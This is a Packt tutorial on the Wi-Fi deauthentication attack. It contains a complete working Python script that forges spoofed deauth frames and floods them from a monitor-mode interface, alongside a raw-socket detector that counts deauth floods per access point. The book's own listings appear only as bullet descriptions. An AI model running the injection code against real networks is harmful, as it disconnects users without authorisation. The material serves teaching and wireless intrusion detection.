The Deauthentication Attack

Packt_Pub
4 min read, Oct 25, 2018


See how a deauthentication attack takes place and how you can detect it in this tutorial by Mohit Raj, the author of Python Penetration Testing Essentials.

The deauthentication (deauth) attack

Deauthentication frames are one kind of management frame. Either side of an association can send one: a client sends a deauthentication frame when it wants to leave the network, and an AP sends one to a client it wants to drop (for example, a client that sends data frames while not associated). The frame is a notification, not a request, so the receiver tears down the association as soon as it arrives. Unless the AP and client negotiated Protected Management Frames (802.11w), nothing in the frame proves who sent it, and an attacker can take advantage of this.

The attacker can spoof the MAC address of the victim and send a deauth frame to the AP on the victim's behalf, so the AP drops the association; or, as the deauth.py frame in this tutorial does, spoof the AP's address and send the deauth frame to the victim, so the victim drops it. Either way the client is knocked off the network until it reconnects, and a flood of such frames keeps it off. aireplay-ng, from the Aircrack-ng suite, is the usual tool for a deauth attack.

In this section, you will learn how to carry out this attack using Python. You can leverage the output of the ssid_finder_raw.py program from the previous section, because it writes the access points it found to a file.

Now take a look at the following code:

  • Import the essential modules and libraries:
  • The following code opens the wireless_data.dat file written by ssid_finder_raw.py, reads the access points it contains, and displays them to the user:
  • The following code asks the user to enter the sequence number of the target AP. If the user wants to target a specific victim, the user can provide the MAC address of the victim's machine; otherwise, the code uses the broadcast address, which deauthenticates every client of that AP:
  • The selected AP operates on a particular channel; the following piece of code switches mon0 to that channel, because injected frames are only heard by the AP and its clients if they go out on the channel they are using:
  • The statement frame = RadioTap()/Dot11(addr1=victim_mac, addr2=BSSID, addr3=BSSID)/Dot11Deauth() builds the deauth frame. addr1 is the receiver (the victim, or the broadcast address), addr2 is the transmitter, spoofed as the AP, and addr3 is the BSSID; the RadioTap() layer is the header the monitor interface expects in front of a frame it is asked to inject:
  • The following code starts the threads that carry out the deauth attack:

In the last line, sendp(frame, iface=interface, count=1000, inter=.1), count is the total number of frames to send and inter is the interval, in seconds, between two consecutive frames:

The output of the deauth.py program is as follows:

The aim of this exercise is not only to knock the victim off the network but also to test the victim's security monitoring: a wireless IDS should be able to detect a deauth flood. Where the AP and its clients use Protected Management Frames (802.11w, optional in WPA2 and mandatory in WPA3), spoofed deauth frames are rejected. Where they do not, which was the common case when this was written, the attack cannot be prevented, but it can be detected.
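To show what the deauth.py steps above actually put on the air, here is an added example that builds the same frame as Dot11(addr1=victim_mac, addr2=BSSID, addr3=BSSID)/Dot11Deauth() byte by byte and injects it through a Linux AF_PACKET raw socket, without Scapy. It is not the book's deauth.py; the interface name mon0, the addresses in the main block and the default count and inter values are assumptions chosen to match the text.

```python
"""Craft an IEEE 802.11 deauthentication frame byte by byte and inject it
from a monitor-mode interface through a Linux AF_PACKET raw socket.

Added example for this article, not the book's deauth.py, and it does not
use Scapy. The interface name (mon0), the addresses in the main block and
the default count/inter values are assumptions chosen to match the text.
"""
import socket
import struct
import time

# Frame Control byte 0 = subtype << 4 | type << 2 | protocol version.
# Management frames are type 0; deauthentication is subtype 12 (0xC).
FC_DEAUTH = bytes([0xC0, 0x00])
BROADCAST = "ff:ff:ff:ff:ff:ff"
# Reason code 7: class 3 frame received from a non-associated station,
# the value aireplay-ng uses.
REASON_CLASS3_FRAME = 7
# Minimal radiotap header: version 0, pad 0, length 8, no fields present.
# The monitor interface consumes it before the frame goes on the air.
RADIOTAP_MIN = struct.pack("<BBHI", 0, 0, 8, 0)


def mac_to_bytes(mac: str) -> bytes:
    """Turn 'aa:bb:cc:dd:ee:ff' into its six raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def build_deauth(victim_mac: str, bssid: str,
                 reason: int = REASON_CLASS3_FRAME, seq: int = 0) -> bytes:
    """Return the 26-byte deauth frame: 24-byte MAC header plus the reason
    code, no FCS (the hardware adds that on transmit).

    addr1 = receiver (the victim, or BROADCAST to hit every client),
    addr2 = transmitter, spoofed as the AP,
    addr3 = BSSID.
    Same layout Scapy builds for
    Dot11(addr1=victim_mac, addr2=BSSID, addr3=BSSID)/Dot11Deauth().
    """
    duration = 0x013A                    # NAV value, 314 microseconds
    seq_ctrl = (seq & 0x0FFF) << 4       # sequence number, fragment 0
    frame = FC_DEAUTH + struct.pack("<H", duration)
    frame += mac_to_bytes(victim_mac) + mac_to_bytes(bssid) + mac_to_bytes(bssid)
    frame += struct.pack("<H", seq_ctrl)
    return frame + struct.pack("<H", reason)   # reason code, little-endian


def send_deauth(iface: str, frame: bytes, count: int = 1000,
                inter: float = 0.1) -> int:
    """Inject 'frame' 'count' times, 'inter' seconds apart, the same
    parameters as Scapy's sendp(frame, iface=..., count=..., inter=...).

    Linux only: AF_PACKET raw sockets need root, and 'iface' must already
    be in monitor mode on the AP's channel. Returns the number sent.
    """
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    try:
        sock.bind((iface, 0))
        packet = RADIOTAP_MIN + frame
        for _ in range(count):
            sock.send(packet)
            time.sleep(inter)
    finally:
        sock.close()
    return count


if __name__ == "__main__":
    # Assumed lab values: replace with the BSSID from wireless_data.dat and
    # the victim's MAC (or BROADCAST to deauthenticate every client).
    deauth = build_deauth("11:22:33:44:55:66", "aa:bb:cc:dd:ee:01")
    print(f"sent {send_deauth('mon0', deauth, count=10, inter=0.1)} frames")
```

Run it as root on a machine whose wireless card is in monitor mode on the target AP's channel; as with the Scapy version, frames sent on the wrong channel are simply never heard. Use it only against an AP and clients you own or are authorised to test.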

Detecting the deauth attack

In this section, you'll learn how to detect a deauth attack. The deauth_ids.py program reports which access points are receiving deauth frames and how many. It uses a raw socket to read frames straight from the monitor interface.

Make sure the interface is in monitor mode (mon0); otherwise, the program will give an error:

  • Import the essential modules and libraries:
  • The queue and counter will be used later:
  • The following code creates and binds the raw socket to mon0:
  • The following ids() function receives frames, picks out the deauth frames, extracts the BSSID from each, and puts it in the global queue:
  • The following insert_frame() function takes BSSIDs from the global queue and keeps a per-BSSID counter, which it displays:
  • The following code creates two threads that start the ids() and insert_frame() functions:

To perform both the attack and the detection, you need two Linux machines with wireless cards that support monitor mode and one wireless access point. One machine performs the attack, while the second runs the deauth_ids.py detection program.

For testing purposes, run deauth_ids.py on one machine and start the deauth attack from the other. Here's the output:

You can see that it continuously displays the BSSID under attack, and its counter shows the number of deauth frames received. Here's another screenshot in continuation:

As you can see, if the attacker changes the target, the program still detects the attack, and it tracks several access points at once.
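The following added example shows the detection side described above in a form you can run offline: it reads radiotap-encapsulated frames from a monitor-mode interface with a Linux AF_PACKET raw socket, as deauth_ids.py does, parses the radiotap and 802.11 management headers by hand, and counts deauthentication frames per BSSID. It goes slightly beyond the book's program by also counting disassociation frames (the other frame attackers use to drop clients) and by raising a one-shot alert when a BSSID crosses a threshold. This is not the book's deauth_ids.py; the interface name mon0, the threshold, and the sample frames at the bottom are constructed assumptions.

```python
"""Detect a deauthentication flood from raw 802.11 frames.

Added example for this article, not the book's deauth_ids.py. The interface
name (mon0), the alert threshold and the sample frames are assumptions.
"""
import socket
import struct
from collections import Counter
from typing import Optional

ETH_P_ALL = 0x0003
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def radiotap_length(buf: bytes) -> int:
    """Radiotap header: u8 version (always 0), u8 pad, u16 LE length, then
    the present bitmap. Only the length matters here; it locates the
    802.11 frame that follows."""
    if len(buf) < 4 or buf[0] != 0:
        raise ValueError("not a radiotap-encapsulated frame")
    return struct.unpack_from("<H", buf, 2)[0]


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt(buf: bytes) -> Optional[dict]:
    """Parse the 24-byte management header after the radiotap header.
    Returns None for data/control frames or truncated input. In management
    frames addr3 is the BSSID; a trailing FCS, if the driver passes one
    up, sits after the body and does not move these offsets."""
    off = radiotap_length(buf)
    if len(buf) < off + 24:
        return None
    fc0 = buf[off]
    if (fc0 >> 2) & 0x3 != TYPE_MGMT:
        return None
    subtype = fc0 >> 4
    info = {
        "subtype": subtype,
        "addr1": bytes_to_mac(buf[off + 4:off + 10]),   # receiver
        "addr2": bytes_to_mac(buf[off + 10:off + 16]),  # transmitter
        "bssid": bytes_to_mac(buf[off + 16:off + 22]),
        "reason": None,
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(buf) >= off + 26:
        info["reason"] = struct.unpack_from("<H", buf, off + 24)[0]
    return info


class DeauthMonitor:
    """Per-BSSID counter of deauth/disassoc frames with a one-shot alert."""

    def __init__(self, threshold: int = 20):
        self.threshold = threshold
        self.counts: Counter = Counter()

    def feed(self, buf: bytes) -> Optional[str]:
        """Account for one captured frame. Returns the BSSID the first time
        its count reaches the threshold, otherwise None."""
        info = parse_mgmt(buf)
        if info is None or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        bssid = info["bssid"]
        self.counts[bssid] += 1
        return bssid if self.counts[bssid] == self.threshold else None


def sniff(iface: str = "mon0", threshold: int = 20) -> None:
    """Live loop: Linux only, needs root and 'iface' in monitor mode."""
    monitor = DeauthMonitor(threshold)
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sock.bind((iface, 0))
    while True:
        buf, _ = sock.recvfrom(4096)
        hit = monitor.feed(buf)
        if hit:
            print(f"deauth flood against BSSID {hit}: {monitor.counts[hit]} frames")


# Constructed sample capture: 8-byte radiotap header with no fields, then
# hand-assembled 802.11 frames without FCS (two deauths, a beacon, a data frame).
RT = bytes.fromhex("0000080000000000")
DEAUTH_AP1 = RT + bytes.fromhex("c0003a01" "112233445566" "aabbccddee01" "aabbccddee01" "0000" "0700")
DEAUTH_AP2 = RT + bytes.fromhex("c0003a01" "ffffffffffff" "aabbccddee02" "aabbccddee02" "0000" "0700")
BEACON_AP1 = RT + bytes.fromhex("80000000" "ffffffffffff" "aabbccddee01" "aabbccddee01" "0000") + bytes(12)
DATA_FRAME = RT + bytes.fromhex("08010000" "aabbccddee01" "112233445566" "aabbccddee01" "0000")


def replay(frames, threshold: int = 3) -> dict:
    """Run the monitor over captured frames offline; returns per-BSSID counts."""
    monitor = DeauthMonitor(threshold)
    for frame in frames:
        monitor.feed(frame)
    return dict(monitor.counts)


if __name__ == "__main__":
    sample = [DEAUTH_AP1] * 3 + [BEACON_AP1, DATA_FRAME] + [DEAUTH_AP2] * 2
    print(replay(sample))
```

The threshold matters in practice: a single deauth frame is normal traffic (APs send them to idle or misbehaving clients), so alert on rate, not on presence, and remember that a capture on one channel only sees attacks on APs using that channel.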

If you found this article interesting and want to learn more about cybersecurity, you can explore Python Penetration Testing Essentials. Updated for Python 3.6.3 and Kali Linux 2018.1, this book gives you the skills you need to use Python for penetration testing, with the help of detailed hands-on code examples.
